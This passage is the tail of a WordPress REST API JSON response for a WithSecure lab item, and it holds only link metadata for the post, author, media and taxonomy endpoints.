<\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/lab_item\/7584","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/users\/3"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/media\/8859"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/media?parent=7584"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/categories?post=7584"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/labs_content_type?post=7584"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}